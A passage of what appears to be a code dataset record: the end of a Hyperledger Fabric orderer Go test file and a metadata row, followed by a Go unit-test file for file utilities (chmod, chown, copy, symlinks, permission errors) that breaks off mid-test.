ServerPrivateKey: "key",
ServerCertificate: "cert",
RootCAs: []string{"ca"},
},
},
},
generalSrv: &comm.GRPCServer{},
},
} {
t.Run(testCase.name, func(t *testing.T) {
if testCase.shouldBeEqual {
conf, srv := configureClusterListener(testCase.conf, testCase.generalConf, loadPEM)
assert.Equal(t, conf, testCase.generalConf)
assert.Equal(t, srv, testCase.generalSrv)
}
if testCase.expectedPanic != "" {
f := func() {
configureClusterListener(testCase.conf, testCase.generalConf, loadPEM)
}
assert.Contains(t, panicMsg(f), testCase.expectedPanic)
} else {
configureClusterListener(testCase.conf, testCase.generalConf, loadPEM)
}
// Ensure logged messages that are expected were all logged
var loggedMessages []string
for len(logEntries) > 0 {
logEntry := <-logEntries
loggedMessages = append(loggedMessages, logEntry)
}
assert.Subset(t, loggedMessages, testCase.expectedLogEntries)
})
}
}
func TestReuseListener(t *testing.T) {
t.Run("good to reuse", func(t *testing.T) {
top := &localconfig.TopLevel{General: localconfig.General{TLS: localconfig.TLS{Enabled: true}}}
require.True(t, reuseListener(top, "foo"))
})
t.Run("reuse tls disabled", func(t *testing.T) {
top := &localconfig.TopLevel{}
require.PanicsWithValue(
t,
"TLS is required for running ordering nodes of type foo.",
func() { reuseListener(top, "foo") },
)
})
t.Run("good not to reuse", func(t *testing.T) {
top := &localconfig.TopLevel{
General: localconfig.General{
Cluster: localconfig.Cluster{
ListenAddress: "127.0.0.1",
ListenPort: 5000,
ServerPrivateKey: "key",
ServerCertificate: "bad",
},
},
}
require.False(t, reuseListener(top, "foo"))
})
t.Run("partial config", func(t *testing.T) {
top := &localconfig.TopLevel{
General: localconfig.General{
Cluster: localconfig.Cluster{
ListenAddress: "127.0.0.1",
ListenPort: 5000,
ServerCertificate: "bad",
},
},
}
require.PanicsWithValue(
t,
"Options: General.Cluster.ListenPort, General.Cluster.ListenAddress,"+
" General.Cluster.ServerCertificate, General.Cluster.ServerPrivateKey, should be defined altogether.",
func() { reuseListener(top, "foo") },
)
})
}
func TestInitializeEtcdraftConsenter(t *testing.T) {
consenters := make(map[string]consensus.Consenter)
tmpdir, err := ioutil.TempDir("", "main_test-")
require.NoError(t, err)
defer os.RemoveAll(tmpdir)
rlf, err := fileledger.New(tmpdir, &disabled.Provider{})
require.NoError(t, err)
conf := genesisconfig.Load(genesisconfig.SampleInsecureSoloProfile, configtest.GetDevConfigDir())
genesisBlock := encoder.New(conf).GenesisBlock()
ca, _ := tlsgen.NewCA()
crt, _ := ca.NewServerCertKeyPair("127.0.0.1")
srv, err := comm.NewGRPCServer("127.0.0.1:0", comm.ServerConfig{})
assert.NoError(t, err)
cryptoProvider, err := sw.NewDefaultSecurityLevelWithKeystore(sw.NewDummyKeyStore())
assert.NoError(t, err)
initializeEtcdraftConsenter(consenters,
&localconfig.TopLevel{},
rlf,
&cluster.PredicateDialer{},
genesisBlock, &replicationInitiator{cryptoProvider: cryptoProvider},
comm.ServerConfig{
SecOpts: comm.SecureOptions{
Certificate: crt.Cert,
Key: crt.Key,
UseTLS: true,
},
},
srv,
&multichannel.Registrar{},
&disabled.Provider{},
cryptoProvider,
)
assert.NotNil(t, consenters["etcdraft"])
}
func genesisConfig(t *testing.T, genesisFile string) *localconfig.TopLevel {
t.Helper()
localMSPDir := configtest.GetDevMspDir()
return &localconfig.TopLevel{
General: localconfig.General{
BootstrapMethod: "file",
BootstrapFile: genesisFile,
LocalMSPDir: localMSPDir,
LocalMSPID: "SampleOrg",
BCCSP: &factory.FactoryOpts{
ProviderName: "SW",
SwOpts: &factory.SwOpts{
HashFamily: "SHA2",
SecLevel: 256,
Ephemeral: true,
},
},
},
}
}
func panicMsg(f func()) string {
var message interface{}
func() {
defer func() {
message = recover()
}()
f()
}()
return message.(string)
}
func TestCreateReplicator(t *testing.T) {
cleanup := configtest.SetDevFabricConfigPath(t)
defer cleanup()
bootBlock := encoder.New(genesisconfig.Load(genesisconfig.SampleDevModeSoloProfile)).GenesisBlockForChannel("system")
iterator := &deliver_mocks.BlockIterator{}
iterator.NextReturnsOnCall(0, bootBlock, common.Status_SUCCESS)
iterator.NextReturnsOnCall(1, bootBlock, common.Status_SUCCESS)
ledger := &server_mocks.ReadWriter{}
ledger.HeightReturns(1)
ledger.IteratorReturns(iterator, 1)
ledgerFactory := &server_mocks.Factory{}
ledgerFactory.On("GetOrCreate", "mychannel").Return(ledger, nil)
ledgerFactory.On("ChannelIDs").Return([]string{"mychannel"})
cryptoProvider, err := sw.NewDefaultSecurityLevelWithKeystore(sw.NewDummyKeyStore())
assert.NoError(t, err)
signer := &server_mocks.SignerSerializer{}
r := createReplicator(ledgerFactory, bootBlock, &localconfig.TopLevel{}, comm.SecureOptions{}, signer, cryptoProvider)
err = r.verifierRetriever.RetrieveVerifier("mychannel").VerifyBlockSignature(nil, nil)
assert.EqualError(t, err, "implicit policy evaluation failed - 0 sub-policies were satisfied, but this policy requires 1 of the 'Writers' sub-policies to be satisfied")
err = r.verifierRetriever.RetrieveVerifier("system").VerifyBlockSignature(nil, nil)
assert.NoError(t, err)
}
func produceGenesisFile(t *testing.T, profile, channelID string) string {
conf := genesisconfig.Load(profile, configtest.GetDevConfigDir())
f, err := ioutil.TempFile("", fmt.Sprintf("%s-genesis_block-", t.Name()))
require.NoError(t, err)
_, err = f.Write(protoutil.MarshalOrPanic(encoder.New(conf).GenesisBlockForChannel(channelID)))
require.NoError(t, err)
err = f.Close()
require.NoError(t, err)
return f.Name()
}
| [
"\"FABRIC_LOGGING_SPEC\"",
"\"FABRIC_LOGGING_SPEC\""
]
| []
| [
"FABRIC_LOGGING_SPEC"
]
| [] | ["FABRIC_LOGGING_SPEC"] | go | 1 | 0 | |
pkg/sys/fileutil_test.go | package sys
import (
"fmt"
"io/ioutil"
"os"
"path"
"path/filepath"
"runtime"
"strings"
"testing"
"testing/iotest"
"github.com/phR0ze/n/pkg/test"
"github.com/stretchr/testify/assert"
)
func TestChmod(t *testing.T) {
resetTest()
// Create test files in dir for globbing and valide modes
dir, err := MkdirP(path.Join(tmpDir, "dir"))
assert.Equal(t, os.ModeDir|os.FileMode(0755), Mode(dir))
assert.Nil(t, err)
file1, err := CopyFile(testfile, path.Join(dir, "file1"))
assert.Nil(t, err)
assert.Equal(t, os.FileMode(0644), Mode(file1))
file2, err := CopyFile(testfile, path.Join(dir, "file2"))
assert.Nil(t, err)
assert.Equal(t, os.FileMode(0644), Mode(file2))
bob1, err := CopyFile(testfile, path.Join(dir, "bob1"))
assert.Nil(t, err)
assert.Equal(t, os.FileMode(0644), Mode(bob1))
// force chmod to fail
{
test.OneShotForceOSChmodError()
err := Chmod(dir, 0644)
assert.True(t, strings.HasPrefix(err.Error(), "failed to add permissions with chmod"))
assert.True(t, strings.HasSuffix(err.Error(), ": invalid argument"))
}
// glob and recurse means globbing wins when working with files
// but recursion wins when working with dirs
{
err := Chmod(path.Join(dir, "*1"), 0444, RecurseOpt(true))
assert.Nil(t, err)
assert.Equal(t, os.ModeDir|os.FileMode(0755), Mode(dir))
assert.Equal(t, os.FileMode(0444), Mode(file1))
assert.Equal(t, os.FileMode(0644), Mode(file2))
assert.Equal(t, os.FileMode(0444), Mode(bob1))
}
// recurse and try only opts
{
// Apply to all files/dirs
err := Chmod(dir, 0600, RecurseOpt(true))
assert.Nil(t, err)
assert.Equal(t, os.ModeDir|os.FileMode(0600), Mode(dir))
// Now we can't validate these yet as we lost execute on the dir
// Now fix the dirs only
err = Chmod(dir, 0755, RecurseOpt(true), OnlyDirsOpt(true))
assert.Nil(t, err)
assert.Equal(t, os.ModeDir|os.FileMode(0755), Mode(dir))
assert.Equal(t, os.FileMode(0600), Mode(file1))
assert.Equal(t, os.FileMode(0600), Mode(file2))
assert.Equal(t, os.FileMode(0600), Mode(bob1))
// Now change just the files back to 644
err = Chmod(dir, 0644, RecurseOpt(true), OnlyFilesOpt(true))
assert.Nil(t, err)
assert.Equal(t, os.ModeDir|os.FileMode(0755), Mode(dir))
assert.Equal(t, os.FileMode(0644), Mode(file1))
assert.Equal(t, os.FileMode(0644), Mode(file2))
assert.Equal(t, os.FileMode(0644), Mode(bob1))
}
// invalid file globbing i.e. doesn't exist
{
err := Chmod(path.Join(tmpDir, "bogus"), 0644)
assert.True(t, strings.HasPrefix(err.Error(), "failed to get any sources for"))
}
// No path given
{
err := Chmod("", 0644)
assert.Equal(t, "empty string is an invalid path", err.Error())
}
}
func TestRevokingMode(t *testing.T) {
// Test other octect
assert.False(t, revokingMode(0777, 0777))
assert.False(t, revokingMode(0776, 0775))
assert.False(t, revokingMode(0770, 0771))
assert.True(t, revokingMode(0776, 0772))
assert.True(t, revokingMode(0775, 0776))
assert.True(t, revokingMode(0775, 0774))
// Test group octect
assert.False(t, revokingMode(0777, 0777))
assert.False(t, revokingMode(0767, 0757))
assert.False(t, revokingMode(0707, 0717))
assert.True(t, revokingMode(0767, 0727))
assert.True(t, revokingMode(0757, 0767))
assert.True(t, revokingMode(0757, 0747))
// Test owner octect
assert.False(t, revokingMode(0777, 0777))
assert.False(t, revokingMode(0677, 0577))
assert.False(t, revokingMode(0077, 0177))
assert.True(t, revokingMode(0677, 0277))
assert.True(t, revokingMode(0577, 0677))
assert.True(t, revokingMode(0577, 0477))
assert.True(t, revokingMode(0577, 0177))
}
func TestChown(t *testing.T) {
resetTest()
// invalid file globbing i.e. doesn't exist
{
err := Chown(path.Join(tmpDir, "bogus"), 50, 50)
assert.True(t, strings.HasPrefix(err.Error(), "failed to get any sources for"))
}
// No path given
{
err := Chown("", 50, 50)
assert.Equal(t, "empty string is an invalid path", err.Error())
}
}
func TestCopyGlob(t *testing.T) {
// force Glob error
{
test.OneShotForceFilePathGlobError()
err := Copy(testfile, tmpfile)
assert.True(t, strings.HasPrefix(err.Error(), "failed to get glob for"))
assert.True(t, strings.HasSuffix(err.Error(), ": invalid argument"))
}
// single file to non-existing dst is a copy to not copy into
{
resetTest()
// Create src dir and target file
srcDir := path.Join(tmpDir, "src")
_, err := MkdirP(srcDir)
assert.Nil(t, err)
_, err = Touch(path.Join(srcDir, "newfile1"))
assert.Nil(t, err)
// Now try to copy with bad glob pattern
err = Copy(path.Join(tmpDir, "*/newfile*"), path.Join(tmpDir, "dst"))
assert.Nil(t, err)
// Validate resulting paths
results, err := AllPaths(tmpDir)
assert.Nil(t, err)
tmpDirAbs, err := Abs(tmpDir)
for i := range results {
results[i] = strings.TrimPrefix(results[i], tmpDirAbs)
}
assert.Equal(t, []string{"", "/dst", "/src", "/src/newfile1"}, results)
// Validate resulting file data
data1, err := ReadString(path.Join(tmpDir, "src/newfile1"))
assert.Nil(t, err)
data2, err := ReadString(path.Join(tmpDir, "dst"))
assert.Equal(t, data1, data2)
}
// multiple files to non-existing dst
{
resetTest()
// Create src dir and target file
srcDir := path.Join(tmpDir, "src")
_, err := MkdirP(srcDir)
assert.Nil(t, err)
_, err = Touch(path.Join(srcDir, "newfile1"))
assert.Nil(t, err)
_, err = Touch(path.Join(srcDir, "newfile2"))
assert.Nil(t, err)
// Now try to copy with bad glob pattern
err = Copy(path.Join(tmpDir, "*/newfile*"), path.Join(tmpDir, "dst"))
assert.Nil(t, err)
assert.FileExists(t, path.Join(tmpDir, "dst/newfile1"))
assert.FileExists(t, path.Join(tmpDir, "dst/newfile2"))
}
// multiple files to pre-existing directory
{
resetTest()
dst := path.Join(tmpDir)
err := Copy("./*", dst)
assert.Nil(t, err)
expected, err := AllPaths(".")
assert.Nil(t, err)
results, err := AllPaths(tmpDir)
assert.Nil(t, err)
for i := range results {
expected[i] = path.Base(expected[i])
results[i] = path.Base(results[i])
}
assert.Equal(t, "sys", expected[0])
assert.Equal(t, "temp", results[0])
assert.Equal(t, expected[1:], results[1:])
}
}
func TestCopyWithPermissionFailures(t *testing.T) {
// try to create destination dirs in no write destination
{
resetTest()
// Create src dir with no read permissions
srcDir := path.Join(tmpDir, "src")
_, err := MkdirP(srcDir)
assert.Nil(t, err)
_, err = Touch(path.Join(srcDir, "file"))
assert.Nil(t, err)
// Create dst dir with no write permissions
dstDir := path.Join(tmpDir, "dst")
_, err = MkdirP(dstDir)
assert.Nil(t, err)
assert.Nil(t, os.Chmod(dstDir, 0444))
// Now copy from src to sub dir under dst
err = Copy(srcDir, path.Join(dstDir, "sub/file"))
assert.True(t, strings.HasPrefix(err.Error(), "mkdir"))
assert.True(t, strings.Contains(err.Error(), "permission denied"))
// Fix the permission on the dstDir
assert.Nil(t, os.Chmod(dstDir, 0755))
}
// read from no read permission source failure
{
resetTest()
// Create src dir with no read permissions
srcDir := path.Join(tmpDir, "src")
_, err := MkdirP(srcDir)
assert.Nil(t, err)
assert.Nil(t, os.Chmod(srcDir, 0222))
// Now try to copy from src
err = Copy(srcDir, path.Join(tmpDir, "dst"))
assert.True(t, strings.HasPrefix(err.Error(), "failed to open directory"))
assert.True(t, strings.Contains(err.Error(), "permission denied"))
// Fix the permission on the dstDir
assert.Nil(t, os.Chmod(srcDir, 0755))
}
}
func TestCopyDirLinksFailure(t *testing.T) {
resetTest()
// Create sub dir with link to it
srcDir := path.Join(tmpDir, "src")
_, err := MkdirP(srcDir)
assert.Nil(t, err)
linkDir := path.Join(tmpDir, "link")
assert.Nil(t, os.Symlink(srcDir, linkDir))
// Now create the destination with readonly permissions
dstDir := path.Join(tmpDir, "dst")
_, err = MkdirP(dstDir)
assert.Nil(t, err)
assert.Nil(t, os.Chmod(dstDir, 0444))
// Now try to copy the linkDir to the dstDir
err = Copy(linkDir, dstDir)
assert.True(t, strings.HasPrefix(err.Error(), "symlink"))
assert.True(t, strings.Contains(err.Error(), "permission denied"))
// Fix the permission on the dstDir
assert.Nil(t, os.Chmod(dstDir, 0755))
}
func TestCopyLinksRelativeNoFollow(t *testing.T) {
resetTest()
// temp/first/f0,f1
firstDir, _ := MkdirP(path.Join(tmpDir, "first"))
Touch(path.Join(firstDir, "f0"))
Touch(path.Join(firstDir, "f1"))
// temp/second/s0,s1
secondDir, _ := MkdirP(path.Join(tmpDir, "second"))
Touch(path.Join(secondDir, "s0"))
Touch(path.Join(secondDir, "s1"))
// Create sysmlink in first dir to second dir
// temp/first/second => temp/second
symlink := path.Join(tmpDir, "first", "second")
assert.Nil(t, os.Symlink("../second", symlink))
// Copy first dir to dst without following links
{
beforeInfo, err := Lstat(secondDir)
assert.Nil(t, err)
dstDir, _ := Abs(path.Join(tmpDir, "dst"))
assert.Nil(t, Copy(firstDir, dstDir))
// Compute results
results, _ := AllPaths(dstDir)
for i := 0; i < len(results); i++ {
results[i] = SlicePath(results[i], -2, -1)
}
// Check that second is a link same as it was originally
srcInfo, err := Lstat(path.Join(firstDir, "second"))
assert.Nil(t, err)
assert.True(t, srcInfo.IsSymlink())
dstInfo, err := Lstat(path.Join(dstDir, "second"))
assert.Nil(t, err)
assert.True(t, dstInfo.IsSymlink())
assert.Equal(t, srcInfo.Mode(), dstInfo.Mode())
srcTarget, _ := srcInfo.SymlinkTarget()
dstTarget, _ := dstInfo.SymlinkTarget()
assert.Equal(t, srcTarget, dstTarget)
assert.Equal(t, "../second", dstTarget)
// Compare expected to results
assert.Equal(t, []string{"temp/dst", "dst/f0", "dst/f1", "dst/second", "temp/second", "second/s0", "second/s1"}, results)
afterInfo, err := Lstat(secondDir)
assert.Nil(t, err)
assert.Equal(t, beforeInfo.Mode(), afterInfo.Mode())
}
}
func TestCopyLinksAbsNoFollow(t *testing.T) {
resetTest()
// temp/first/f0,f1
firstDir, _ := MkdirP(path.Join(tmpDir, "first"))
Touch(path.Join(firstDir, "f0"))
Touch(path.Join(firstDir, "f1"))
// temp/second/s0,s1
secondDir, _ := MkdirP(path.Join(tmpDir, "second"))
Touch(path.Join(secondDir, "s0"))
Touch(path.Join(secondDir, "s1"))
// Create sysmlink in first dir to second dir
// temp/first/second => temp/second
symlink := path.Join(tmpDir, "first", "second")
assert.Nil(t, os.Symlink(secondDir, symlink))
// Copy first dir to dst without following links
{
beforeInfo, err := Lstat(secondDir)
assert.Nil(t, err)
dstDir, _ := Abs(path.Join(tmpDir, "dst"))
assert.Nil(t, Copy(firstDir, dstDir))
// Compute results
results, _ := AllPaths(dstDir)
for i := 0; i < len(results); i++ {
results[i] = SlicePath(results[i], -2, -1)
}
// Check that second is a link same as it was originally
srcInfo, err := Lstat(path.Join(firstDir, "second"))
assert.Nil(t, err)
assert.True(t, srcInfo.IsSymlink())
dstInfo, err := Lstat(path.Join(dstDir, "second"))
assert.Nil(t, err)
assert.True(t, dstInfo.IsSymlink())
assert.Equal(t, srcInfo.Mode(), dstInfo.Mode())
srcTarget, _ := srcInfo.SymlinkTarget()
dstTarget, _ := dstInfo.SymlinkTarget()
assert.Equal(t, srcTarget, dstTarget)
assert.Equal(t, "test/temp/second", SlicePath(dstTarget, -3, -1))
// Compare expected to results
assert.Equal(t, []string{"temp/dst", "dst/f0", "dst/f1", "dst/second", "temp/second", "second/s0", "second/s1"}, results)
afterInfo, err := Lstat(secondDir)
assert.Nil(t, err)
assert.Equal(t, beforeInfo.Mode(), afterInfo.Mode())
}
}
func TestCopy(t *testing.T) {
// invalid files
{
// invalid dst
err := Copy("", "")
assert.Equal(t, "empty string is an invalid path", err.Error())
// invalid src
err = Copy("", "foo")
assert.Equal(t, "empty string is an invalid path", err.Error())
// invalid file globbing i.e. doesn't exist
err = Copy("foo", "bar")
assert.True(t, strings.HasPrefix(err.Error(), "failed to get any sources for"))
}
// test/temp/pkg does not exist so copy sys contents to pkg i.e. test/temp/pkg
{
resetTest()
src := "."
dst := path.Join(tmpDir, "pkg")
assert.Nil(t, Copy(src, dst))
srcPaths, err := AllPaths(src)
assert.Nil(t, err)
dstPaths, err := AllPaths(dst)
assert.Nil(t, err)
for i := range dstPaths {
srcPaths[i] = path.Base(srcPaths[i])
dstPaths[i] = path.Base(dstPaths[i])
}
assert.Equal(t, "sys", srcPaths[0])
assert.Equal(t, "pkg", dstPaths[0])
assert.Equal(t, srcPaths[1:], dstPaths[1:])
}
// test/temp/pkg does exist so copy sys dir into pkg i.e. test/temp/pkg/sys
{
resetTest()
src, err := Abs(".")
assert.Nil(t, err)
src += "/" // trailing slashes on an abs path seem to change behavior
dst, err := Abs(path.Join(tmpDir, "pkg"))
assert.Nil(t, err)
dst += "/" // trailing slashes on an abs path seem to change behavior
MkdirP(dst)
assert.Nil(t, Copy(src, dst))
srcPaths, err := AllPaths(src)
assert.Nil(t, err)
dstPaths, err := AllPaths(path.Join(dst, "sys"))
assert.Nil(t, err)
for i := range dstPaths {
srcPaths[i] = path.Base(srcPaths[i])
dstPaths[i] = path.Base(dstPaths[i])
}
assert.Equal(t, srcPaths, dstPaths)
}
}
func TestCopyLinkedDir(t *testing.T) {
// reset state
dir := filepath.Join(tmpDir, "LinkedDir")
RemoveAll(dir)
dir, err := MkdirP(dir)
assert.NoError(t, err)
// create a dir to test
dir1, err := MkdirP(filepath.Join(dir, "dir1"))
assert.NoError(t, err)
// create a link to test
link1 := filepath.Join(dir, "link1")
err = Symlink(dir1, link1)
assert.NoError(t, err)
// create test files
file1, err := Touch(filepath.Join(dir1, "file1"))
assert.NoError(t, err)
assert.FileExists(t, file1)
file2, err := Touch(filepath.Join(dir1, "file2"))
assert.NoError(t, err)
assert.FileExists(t, file2)
// Copy dir1 to dir2 via link1
dir2 := filepath.Join(dir, "dir2")
err = Copy(link1, dir2, FollowOpt(true))
assert.NoError(t, err)
results, err := AllPaths(dir2)
assert.NoError(t, err)
files := []string{}
for _, result := range results {
files = append(files, SlicePath(result, -3, -1))
}
assert.Equal(t, []string{"temp/LinkedDir/dir2", "LinkedDir/dir2/file1", "LinkedDir/dir2/file2"}, files)
}
func TestCopyLinkedDirNested(t *testing.T) {
// reset state
dir := filepath.Join(tmpDir, "LinkedDirNested")
RemoveAll(dir)
dir, err := MkdirP(dir)
assert.NoError(t, err)
// create dirs to test with
dir1, err := MkdirP(filepath.Join(dir, "dir1"))
assert.NoError(t, err)
dir2, err := MkdirP(filepath.Join(dir, "dir2"))
assert.NoError(t, err)
// create a link to test with
link1 := filepath.Join(dir1, "link1")
err = Symlink(dir2, link1)
assert.NoError(t, err)
// create test files
file1, err := Touch(filepath.Join(dir2, "file1"))
assert.NoError(t, err)
assert.FileExists(t, file1)
file2, err := Touch(filepath.Join(dir2, "file2"))
assert.NoError(t, err)
assert.FileExists(t, file2)
// Copy dir1 to dir2 via link1
dir3 := filepath.Join(dir, "dir3")
err = Copy(dir1, dir3, FollowOpt(true))
assert.NoError(t, err)
results, err := AllPaths(dir3)
assert.NoError(t, err)
files := []string{}
for _, result := range results {
files = append(files, SlicePath(result, -3, -1))
}
assert.Equal(t, []string{"temp/LinkedDirNested/dir3", "LinkedDirNested/dir3/link1", "dir3/link1/file1", "dir3/link1/file2"}, files)
}
func TestDarwin(t *testing.T) {
if runtime.GOOS == "darwin" {
assert.True(t, Darwin())
} else {
assert.False(t, Darwin())
}
}
func TestLinux(t *testing.T) {
if runtime.GOOS == "linux" {
assert.True(t, Linux())
} else {
assert.False(t, Linux())
}
}
func TestWindows(t *testing.T) {
if runtime.GOOS == "windows" {
assert.True(t, Windows())
} else {
assert.False(t, Windows())
}
}
func TestCopyWithFileParentDoentExist(t *testing.T) {
// test/temp/foo/bar/README.md does not exist and neither does its parent
// so foo/bar will be created then Copy README.md to bar will be a clone
resetTest()
src := "./README.md"
dst := path.Join(tmpDir, "foo/bar/readme")
assert.False(t, Exists(dst))
assert.Nil(t, Copy(src, dst))
assert.True(t, Exists(dst))
srcMD5, err := MD5(src)
assert.Nil(t, err)
dstMD5, err := MD5(dst)
assert.Nil(t, err)
assert.Equal(t, srcMD5, dstMD5)
}
func TestCopyFileParentDoentExist(t *testing.T) {
// test/temp/foo/bar/README.md does not exist and neither does its parent
// so foo/bar will be created then Copy README.md to bar will be a clone
resetTest()
src := "./README.md"
dst := path.Join(tmpDir, "foo/bar/readme")
assert.False(t, Exists(dst))
_, err := CopyFile(src, dst)
assert.Nil(t, err)
assert.True(t, Exists(dst))
srcMD5, err := MD5(src)
assert.Nil(t, err)
dstMD5, err := MD5(dst)
assert.Nil(t, err)
assert.Equal(t, srcMD5, dstMD5)
}
func TestCopyWithDirParentDoentExist(t *testing.T) {
// test/temp/foo/bar/pkg does not exist and neither does its parent
// so foo/bar will be created then Copy sys to pkg will be a clone
resetTest()
src := "."
dst := path.Join(tmpDir, "foo/bar/pkg")
assert.Nil(t, Copy(src, dst))
srcPaths, err := AllPaths(src)
assert.Nil(t, err)
dstPaths, err := AllPaths(dst)
assert.Nil(t, err)
for i := range dstPaths {
srcPaths[i] = path.Base(srcPaths[i])
dstPaths[i] = path.Base(dstPaths[i])
}
assert.Equal(t, "sys", srcPaths[0])
assert.Equal(t, "pkg", dstPaths[0])
assert.Equal(t, srcPaths[1:], dstPaths[1:])
}
func TestCopyFile(t *testing.T) {
resetTest()
// force chmod error only
{
test.OneShotForceOSChmodError()
result, err := CopyFile(testfile, tmpfile)
assert.Equal(t, "", result)
assert.True(t, strings.HasPrefix(err.Error(), "failed to chmod file"))
assert.True(t, strings.HasSuffix(err.Error(), ": invalid argument"))
assert.Nil(t, Remove(tmpfile))
}
// force close error only
{
test.OneShotForceOSCloseError()
result, err := CopyFile(testfile, tmpfile)
assert.Equal(t, "", result)
assert.True(t, strings.HasPrefix(err.Error(), "failed to close file"))
assert.True(t, strings.HasSuffix(err.Error(), ": invalid argument"))
assert.Nil(t, Remove(tmpfile))
}
// force sync error and close error
{
test.OneShotForceOSSyncError()
test.OneShotForceOSCloseError()
result, err := CopyFile(testfile, tmpfile)
assert.Equal(t, "", result)
assert.True(t, strings.HasPrefix(err.Error(), "failed to close file"))
assert.True(t, strings.Contains(err.Error(), ": failed to sync data to file"))
assert.True(t, strings.HasSuffix(err.Error(), ": invalid argument"))
assert.Nil(t, Remove(tmpfile))
}
// force copy error and close error
{
test.OneShotForceIOCopyError()
test.OneShotForceOSCloseError()
result, err := CopyFile(testfile, tmpfile)
assert.Equal(t, "", result)
assert.True(t, strings.HasPrefix(err.Error(), "failed to close file"))
assert.True(t, strings.Contains(err.Error(), ": failed to copy data to file"))
assert.True(t, strings.HasSuffix(err.Error(), ": invalid argument"))
assert.Nil(t, Remove(tmpfile))
}
// copy symlink to readonly dest - failure
{
// Create link to a bogus file
link := path.Join(tmpDir, "link")
err := Symlink(path.Join(tmpDir, "bogus"), link)
assert.Nil(t, err)
// Create dst dir with readonly permissions
dstDir, err := MkdirP(path.Join(tmpDir, "dst"))
assert.Nil(t, err)
err = os.Chmod(dstDir, 0444)
assert.Nil(t, err)
// Copy link to dst with readonly permssions and see failure
result, err := CopyFile(link, dstDir)
assert.Equal(t, "", result)
assert.True(t, strings.HasPrefix(err.Error(), "symlink"))
assert.True(t, strings.Contains(err.Error(), "permission denied"))
// Reset permission so dst dir
err = os.Chmod(dstDir, 0755)
assert.Nil(t, err)
}
resetTest()
// CopyFile symlink
{
// Create link to a bogus file
link := path.Join(tmpDir, "link")
err := Symlink(path.Join(tmpDir, "bogus"), link)
assert.Nil(t, err)
newlink := path.Join(tmpDir, "newlink")
result, err := CopyFile(link, newlink)
assert.Equal(t, SlicePath(newlink, -2, -1), SlicePath(result, -2, -1))
assert.Nil(t, err)
// Validate files and link locations
linkInfo, err := Lstat(link)
assert.Nil(t, err)
assert.True(t, linkInfo.IsSymlink())
assert.False(t, linkInfo.SymlinkTargetExists())
linkTarget, err := linkInfo.SymlinkTarget()
assert.Nil(t, err)
assert.Equal(t, "../../test/temp/bogus", linkTarget)
newlinkInfo, err := Lstat(newlink)
assert.Nil(t, err)
assert.True(t, newlinkInfo.IsSymlink())
assert.False(t, newlinkInfo.SymlinkTargetExists())
assert.False(t, SymlinkTargetExists(newlink))
newlinkTarget, err := newlinkInfo.SymlinkTarget()
assert.Nil(t, err)
assert.Equal(t, "../../test/temp/bogus", newlinkTarget)
// Create bogus file and test that symlink target exists
_, err = Touch(path.Join(tmpDir, "bogus"))
assert.Nil(t, err)
assert.True(t, newlinkInfo.SymlinkTargetExists())
assert.True(t, SymlinkTargetExists(newlink))
}
resetTest()
// target file is not readable via permissions
{
// Write out a temp file
err := WriteString(tmpfile, `This is a test of the emergency broadcast system.`)
assert.Nil(t, err)
// Revoke read permissions
assert.Nil(t, os.Chmod(tmpfile, 0222))
// Try to copy it and fail
result, err := CopyFile(tmpfile, path.Join(tmpDir, "new"))
assert.Equal(t, "", result)
assert.True(t, strings.HasPrefix(err.Error(), "failed to open file"))
assert.True(t, strings.Contains(err.Error(), "permission denied"))
assert.Nil(t, os.Chmod(tmpfile, 0644))
assert.Nil(t, Remove(tmpfile))
}
// source symlink and target doesn't exist
{
// Setup link to bogus file
subDir, err := MkdirP(path.Join(tmpDir, "sub"))
assert.Nil(t, err)
linkDir := path.Join(tmpDir, "link")
assert.Nil(t, Symlink(subDir, linkDir))
result, err := CopyFile(linkDir, "new")
assert.Equal(t, "", result)
assert.Equal(t, "src target is not a regular file or a symlink to a file", err.Error())
}
resetTest()
// empty destination
{
result, err := CopyFile(readme, "")
assert.Equal(t, "", result)
assert.Equal(t, "empty string is an invalid path", err.Error())
}
// empty source
{
result, err := CopyFile("", "")
assert.Equal(t, "", result)
assert.Equal(t, "empty string is an invalid path", err.Error())
}
// source doesn't exist
{
result, err := CopyFile(path.Join(tmpDir, "foo"), path.Join(tmpDir, "bar"))
assert.Equal(t, "", result)
assert.True(t, strings.HasPrefix(err.Error(), "failed to execute Lstat against"))
assert.True(t, strings.Contains(err.Error(), "no such file or directory"))
}
// empty info path
{
result, err := CopyFile(path.Join(tmpDir, "foo/foo"), "", InfoOpt(&FileInfo{}))
assert.Equal(t, "", result)
assert.Equal(t, "empty string is an invalid path", err.Error())
}
// pass in bad info
{
result, err := CopyFile(path.Join(tmpDir, "foo/foo"), "", InfoOpt(&FileInfo{Path: "foo/foo"}))
assert.Equal(t, "", result)
assert.True(t, strings.HasPrefix(err.Error(), "failed to execute Lstat against"))
assert.True(t, strings.Contains(err.Error(), "no such file or directory"))
}
// source is a directory
{
subdir, err := MkdirP(path.Join(tmpDir, "sub"))
assert.Nil(t, err)
result, err := CopyFile(subdir, path.Join(tmpDir, "bar"))
assert.Equal(t, "", result)
assert.Equal(t, "src target is not a regular file or a symlink to a file", err.Error())
}
// new destination name
{
result, err := CopyFile(readme, path.Join(tmpDir, "foo"))
assert.Nil(t, err)
assert.Equal(t, "temp/foo", SlicePath(result, -2, -1))
assert.Nil(t, Remove(result))
}
// failed to create destination sub directory
{
subdir, err := MkdirP(path.Join(tmpDir, "sub"))
assert.Nil(t, err)
// Now make subdir readonly
assert.Nil(t, os.Chmod(subdir, 0555))
// Try to copy to a readonly directory
result, err := CopyFile(readme, path.Join(subdir, "foo/bar"))
assert.Equal(t, "", result)
assert.True(t, strings.HasPrefix(err.Error(), "mkdir"))
assert.True(t, strings.Contains(err.Error(), "permission denied"))
// Fix permissions on subdir and remove it
assert.Nil(t, os.Chmod(subdir, 0755))
assert.Nil(t, RemoveAll(subdir))
}
// failed to stat destination
{
subdir, err := MkdirP(path.Join(tmpDir, "sub"))
assert.Nil(t, err)
// Now make subdir readonly
assert.Nil(t, os.Chmod(subdir, 0444))
// Try to copy to a readonly directory
result, err := CopyFile(readme, path.Join(subdir, "foo/bar"))
assert.Equal(t, "", result)
assert.True(t, strings.HasPrefix(err.Error(), "failed to Stat destination"))
assert.True(t, strings.Contains(err.Error(), "permission denied"))
// Fix permissions on subdir and remove it
assert.Nil(t, os.Chmod(subdir, 0755))
assert.Nil(t, RemoveAll(subdir))
}
// failed to create new file permission denied
{
subdir, err := MkdirP(path.Join(tmpDir, "sub"))
assert.Nil(t, err)
// Now make subdir readonly
assert.Nil(t, os.Chmod(subdir, 0444))
// Try to copy to a readonly directory
